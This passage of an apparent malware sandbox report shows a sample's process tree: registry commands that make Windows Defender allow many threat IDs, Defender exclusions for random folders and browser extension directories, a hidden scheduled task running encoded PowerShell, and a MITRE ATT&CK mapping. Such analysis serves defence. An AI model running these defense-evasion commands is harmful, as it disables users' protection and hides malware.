\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:4216
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5772
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3536
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1120
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:2844
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3136
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gNyxlCFCI" /SC once /ST 03:55:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3944
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gNyxlCFCI"
  2⤵
  PID:4392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6120

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

Virtualization/Sandbox Evasion